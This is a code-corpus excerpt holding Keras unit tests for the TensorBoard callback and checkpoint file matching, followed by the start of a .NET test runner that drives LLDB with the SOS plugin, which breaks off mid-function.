'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
elif kind == 'tensor' and tag != 'keras':
# Check for V2 scalar summaries, which have a different PB
# structure.
if event.summary.value[
0].metadata.plugin_data.plugin_name == 'scalars':
container = result.scalars
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self, compile_model=True):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
if compile_model:
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, _, filenames) in os.walk(self.logdir):
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_learning_rate_schedules(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[keras.callbacks.TensorBoard(self.logdir)])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
},
)
def test_TensorBoard_global_step(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
verbose=0,
callbacks=[
keras.callbacks.TensorBoard(
self.logdir,
update_freq=1,
profile_batch=0,
write_steps_per_second=True)
])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
_ObservedSummary(
logdir=self.train_dir, tag='epoch_steps_per_second'),
_ObservedSummary(
logdir=self.train_dir, tag='batch_steps_per_second'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
},
)
def test_TensorBoard_projector_callback(self):
layers = [
keras.layers.Embedding(10, 10, name='test_embedding'),
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
optimizer='adam',
loss=keras.losses.BinaryCrossentropy(from_logits=True),
run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10)), np.ones((10, 10))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir,
embeddings_freq=1,
embeddings_metadata={'test_embedding': 'metadata.tsv'})
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
with open(os.path.join(self.logdir, 'projector_config.pbtxt')) as f:
self.assertEqual(f.readlines(), [
'embeddings {\n',
(' tensor_name: '
'"layer_with_weights-0/embeddings/.ATTRIBUTES/VARIABLE_VALUE"\n'),
' metadata_path: "metadata.tsv"\n', '}\n'
])
def test_custom_summary(self):
if not tf.executing_eagerly():
self.skipTest('Custom summaries only supported in V2 code path.')
def scalar_v2_mock(name, data, step=None):
"""A reimplementation of the scalar plugin to avoid circular deps."""
metadata = tf.compat.v1.SummaryMetadata()
# Should match value in tensorboard/plugins/scalar/metadata.py.
metadata.plugin_data.plugin_name = 'scalars'
with tf.summary.experimental.summary_scope(
name, 'scalar_summary', values=[data, step]) as (tag, _):
return tf.summary.write(
tag=tag,
tensor=tf.cast(data, 'float32'),
step=step,
metadata=metadata)
class LayerWithSummary(keras.layers.Layer):
def call(self, x):
scalar_v2_mock('custom_summary', tf.reduce_sum(x))
return x
model = testing_utils.get_model_from_layers([LayerWithSummary()],
input_shape=(5,),
name='model')
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
x, y = np.ones((10, 5)), np.ones((10, 5))
model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(
logdir=self.train_dir,
tag='model/layer_with_summary/custom_summary'),
_ObservedSummary(
logdir=self.validation_dir,
tag='model/layer_with_summary/custom_summary')
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegex(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
def test_TensorBoard_non_blocking(self):
model = keras.Sequential([keras.layers.Dense(1)])
tb = keras.callbacks.TensorBoard(self.logdir)
self.assertTrue(tb._supports_tf_logs)
cb_list = keras.callbacks.CallbackList([tb],
model=model,
epochs=1,
steps=100,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, TensorBoard is causing a blocking '
'NumPy conversion.')
with tf.compat.v1.test.mock.patch.object(tensor, 'numpy', mock_numpy):
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=testing_utils.should_run_eagerly())
return model
def _count_trace_file(self, logdir):
profile_dir = os.path.join(logdir, 'plugins', 'profile')
count = 0
for (dirpath, dirnames, filenames) in os.walk(profile_dir):
del dirpath # unused
del dirnames # unused
for filename in filenames:
if filename.endswith('.trace.json.gz'):
count += 1
return count
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=3,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
if not model.run_eagerly:
# There should be one train graph
self.assertLen(summary_file.graph_defs, 1)
for graph_def in summary_file.graph_defs:
graph_def_str = str(graph_def)
# All the model layers should appear in the graphs
for layer in model.layers:
if 'input' not in layer.name:
self.assertIn(layer.name, graph_def_str)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_profileBatchRangeSingle(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='2,2', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_profileBatchRangeTwice(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='10,10', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
time.sleep(1) # Avoids the second profile over-writing the first.
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
self.assertEqual(2, self._count_trace_file(logdir=self.train_dir))
# Test case that replicates a Github issue.
# https://github.com/tensorflow/tensorflow/issues/37543
def test_TensorBoard_autoTrace_profileTwiceGraphMode(self):
tf.compat.v1.disable_eager_execution()
inp = keras.Input((1,))
out = keras.layers.Dense(units=1)(inp)
model = keras.Model(inp, out)
model.compile(gradient_descent.SGD(1), 'mse')
logdir = os.path.join(self.get_temp_dir(), 'tb1')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=1)],
)
# Verifies trace exists in the first logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
logdir = os.path.join(self.get_temp_dir(), 'tb2')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=2)],
)
# Verifies trace exists in the second logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
def test_TensorBoard_autoTrace_profileBatchRange(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='1,3', write_graph=False)
model.fit(
x,
y,
batch_size=4,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_3'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_profileInvalidBatchRange(self):
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='-1,3',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='1,None',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='6,5', write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=-1, write_graph=False)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
# Enabled trace only on the 10000th batch, thus it should be empty.
self.assertEmpty(summary_file.tensors)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
class MostRecentlyModifiedFileMatchingPatternTest(tf.test.TestCase):
def test_get_most_recently_modified_file_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
# Ensure the files have been actually written.
self.assertEqual(
set([
os.path.join(test_dir, file_name)
for file_name in os.listdir(test_dir)
]), set(file_paths))
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
def test_some_file_not_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-2])
def test_get_same_file_if_file_name_equals_pattern(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
with open(file_path, 'w') as f:
f.write('foo bar')
self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
file_path)
def test_get_none_if_file_does_not_exist(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
self.assertLen(os.listdir(test_dir), 0)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
None)
def test_using_checkpoint_management_latest_checkpoint(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
ckpt_file_name = 'f.batchXepochY'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
with open(ckpt_file_path, 'w') as f:
f.write('dummy ckpt')
checkpoint_management.update_checkpoint_state_internal(
test_dir, ckpt_file_path)
file_paths = [
os.path.join(test_dir, file_name)
for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
f.write('foo bar')
# The result returned from checkpoint_management.latest_checkpoint takes
# priority, so even if it was written earlier, we should still return that.
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
ckpt_file_path)
class SummaryOpsTest(tf.test.TestCase):
def tearDown(self):
super(SummaryOpsTest, self).tearDown()
tf.summary.trace_off()
def keras_model(self, *args, **kwargs):
logdir = self.get_temp_dir()
writer = tf.summary.create_file_writer(logdir)
with writer.as_default():
keras.callbacks.keras_model_summary(*args, **kwargs)
writer.close()
events = events_from_logdir(logdir)
# The first event contains no summary values. The written content goes to
# the second event.
return events[1]
@testing_utils.run_v2_only
def testKerasModel(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
event = self.keras_model(name='my_name', data=model, step=1)
first_val = event.summary.value[0]
self.assertEqual(model.to_json(), first_val.tensor.string_val[0].decode())
@testing_utils.run_v2_only
def testKerasModel_usesDefaultStep(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
try:
tf.summary.experimental.set_step(42)
event = self.keras_model(name='my_name', data=model)
self.assertEqual(42, event.step)
finally:
# Reset to default state for other tests.
tf.summary.experimental.set_step(None)
@testing_utils.run_v2_only
def testKerasModel_subclass(self):
class SimpleSubclass(keras.Model):
def __init__(self):
super(SimpleSubclass, self).__init__(name='subclass')
self.dense = Dense(10, input_shape=(100,))
self.activation = Activation('relu', name='my_relu')
def call(self, inputs):
x = self.dense(inputs)
return self.activation(x)
model = SimpleSubclass()
with tf.compat.v1.test.mock.patch.object(logging, 'warn') as mock_log:
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args), 'Model failed to serialize as JSON.')
@testing_utils.run_v2_only
def testKerasModel_otherExceptions(self):
model = keras.Sequential()
with tf.compat.v1.test.mock.patch.object(model, 'to_json') as mock_to_json:
with tf.compat.v1.test.mock.patch.object(logging, 'warn') as mock_log:
mock_to_json.side_effect = Exception('oops')
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args),
'Model failed to serialize as JSON. Ignoring')
def events_from_file(filepath):
"""Returns all events in a single event file.
Args:
filepath: Path to the event file.
Returns:
A list of all tf.Event protos in the event file.
"""
result = []
raw_dataset = tf.data.TFRecordDataset([filepath])
for raw_record in raw_dataset.take(10):
event = tf.compat.v1.Event()
event.ParseFromString(raw_record.numpy())
result.append(event)
return result
def events_from_logdir(logdir):
"""Returns all events in the single eventfile in logdir.
Args:
logdir: The directory in which the single event file is sought.
Returns:
A list of all tf.Event protos from the single event file.
Raises:
AssertionError: If logdir does not contain exactly one file.
"""
assert tf.compat.v1.gfile.Exists(logdir)
files = tf.compat.v1.gfile.ListDirectory(logdir)
assert len(files) == 1, 'Found not exactly one file in logdir: %s' % files
return events_from_file(os.path.join(logdir, files[0]))
if __name__ == '__main__':
tf.test.main()
|
test_libsosplugin.py
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the MIT license.
# See the LICENSE file in the project root for more information.
from __future__ import print_function
import unittest
import argparse
import re
import tempfile
import subprocess
import threading
import os
import sys
import inspect
lldb = ''
logfiledir = ''
host = ''
plugin = ''
assembly = ''
fail_flag = ''
fail_flag_lldb = ''
summary_file = ''
timeout = 0
regex = ''
repeat = 0
tests_failed = False
def runWithTimeout(cmd):
p = None
def run():
global p
p = subprocess.Popen(cmd, shell=True)
p.communicate()
thread = threading.Thread(target=run)
thread.start()
thread.join(timeout)
if thread.is_alive():
with open(summary_file, 'a+') as summary:
print('Timeout!', file=summary)
p.kill()
thread.join()
class TestSosCommands(unittest.TestCase):
def do_test(self, command):
open(fail_flag, 'a').close()
try:
os.unlink(fail_flag_lldb)
except:
pass
logfile = os.path.join(logfiledir, command)
cmd = (('%s -b ' % lldb) +
("-k \"script open('%s', 'a').close()\" " % fail_flag_lldb) +
("-k 'quit' ") +
("--no-lldbinit ") +
("-o \"version\" ") +
("-O \"plugin load %s \" " % plugin) +
("-o \"script import testutils as test\" ") +
("-o \"script test.fail_flag = '%s'\" " % fail_flag) +
("-o \"script test.summary_file = '%s'\" " % summary_file) +
("-o \"script test.run('%s', '%s')\" " % (assembly, command)) +
("-o \"quit\" ") +
(" -- %s %s > %s.log 2>&1" % (host, assembly, logfile)))
runWithTimeout(cmd)
if not os.path.isfile(fail_flag):
tests_failed = True
if not os.path.isfile(fail_flag_lldb):
tests_failed = True
self.assertFalse(os.path.isfile(fail_flag))
self.assertFalse(os.path.isfile(fail_flag_lldb))
try:
os.unlink(fail_flag)
except:
pass
try:
os.unlink(fail_flag_lldb)
except:
pass
def t_cmd_bpmd_nofuturemodule_module_function(self):
self.do_test('t_cmd_bpmd_nofuturemodule_module_function')
def t_cmd_bpmd_module_function(self):
self.do_test('t_cmd_bpmd_module_function')
def t_cmd_bpmd_module_function_iloffset(self):
self.do_test('t_cmd_bpmd_module_function_iloffset')
def t_cmd_bpmd_methoddesc(self):
self.do_test('t_cmd_bpmd_methoddesc')
def t_cmd_bpmd_clear(self):
self.do_test('t_cmd_bpmd_clear')
def t_cmd_bpmd_clearall(self):
self.do_test('t_cmd_bpmd_clearall')
def t_cmd_clrstack(self):
self.do_test('t_cmd_clrstack')
def t_cmd_clrthreads(self):
self.do_test('t_cmd_clrthreads')
def t_cmd_clru(self):
self.do_test('t_cmd_clru')
def t_cmd_dumpclass(self):
self.do_test('t_cmd_dumpclass')
def t_cmd_dumpheap(self):
self.do_test('t_cmd_dumpheap')
def t_cmd_dumpil(self):
self.do_test('t_cmd_dumpil')
def t_cmd_dumplog(self):
self.do_test('t_cmd_dumplog')
def t_cmd_dumpmd(self):
self.do_test('t_cmd_dumpmd')
def t_cmd_dumpmodule(self):
self.do_test('t_cmd_dumpmodule')
def t_cmd_dumpmt(self):
self.do_test('t_cmd_dumpmt')
def t_cmd_dumpobj(self):
self.do_test('t_cmd_dumpobj')
def t_cmd_dumpstack(self):
self.do_test('t_cmd_dumpstack')
def t_cmd_dso(self):
self.do_test('t_cmd_dso')
def t_cmd_eeheap(self):
self.do_test('t_cmd_eeheap')
def t_cmd_eestack(self):
self.do_test('t_cmd_eestack')
def t_cmd_gcroot(self):
self.do_test('t_cmd_gcroot')
def t_cmd_ip2md(self):
self.do_test('t_cmd_ip2md')
def t_cmd_name2ee(self):
self.do_test('t_cmd_name2ee')
def t_cmd_pe(self):
self.do_test('t_cmd_pe')
def t_cmd_histclear(self):
self.do_test('t_cmd_histclear')
def t_cmd_histinit(self):
self.do_test('t_cmd_histinit')
def t_cmd_histobj(self):
self.do_test('t_cmd_histobj')
def t_cmd_histobjfind(self):
self.do_test('t_cmd_histobjfind')
def t_cmd_histroot(self):
self.do_test('t_cmd_histroot')
def t_cmd_sos(self):
self.do_test('t_cmd_sos')
def t_cmd_soshelp(self):
self.do_test('t_cmd_soshelp')
def generate_report():
report = [{'name': 'TOTAL', True: 0, False: 0, 'completed': True}]
fail_messages = []
if not os.path.isfile(summary_file):
print('No summary file to process!')
return
with open(summary_file, 'r') as summary:
for line in summary:
if line.startswith('new_suite: '):
report.append({'name': line.split()[-1], True: 0, False: 0,
'completed': False, 'timeout': False})
elif line.startswith('True'):
report[-1][True] += 1
elif line.startswith('False'):
report[-1][False] += 1
elif line.startswith('Completed!'):
report[-1]['completed'] = True
elif line.startswith('Timeout!'):
report[-1]['timeout'] = True
elif line.startswith('!!! '):
fail_messages.append(line.rstrip('\n'))
for suite in report[1:]:
report[0][True] += suite[True]
report[0][False] += suite[False]
report[0]['completed'] &= suite['completed']
for line in fail_messages:
print(line)
print()
print('=' * 79)
print('{:72} {:6}'.format('Test suite', 'Result'))
print('-' * 79)
for suite in report[1:]:
if suite['timeout']:
result = 'Timeout'
elif suite[False]:
result = 'Fail'
elif not suite['completed']:
result = 'Crash'
elif suite[True]:
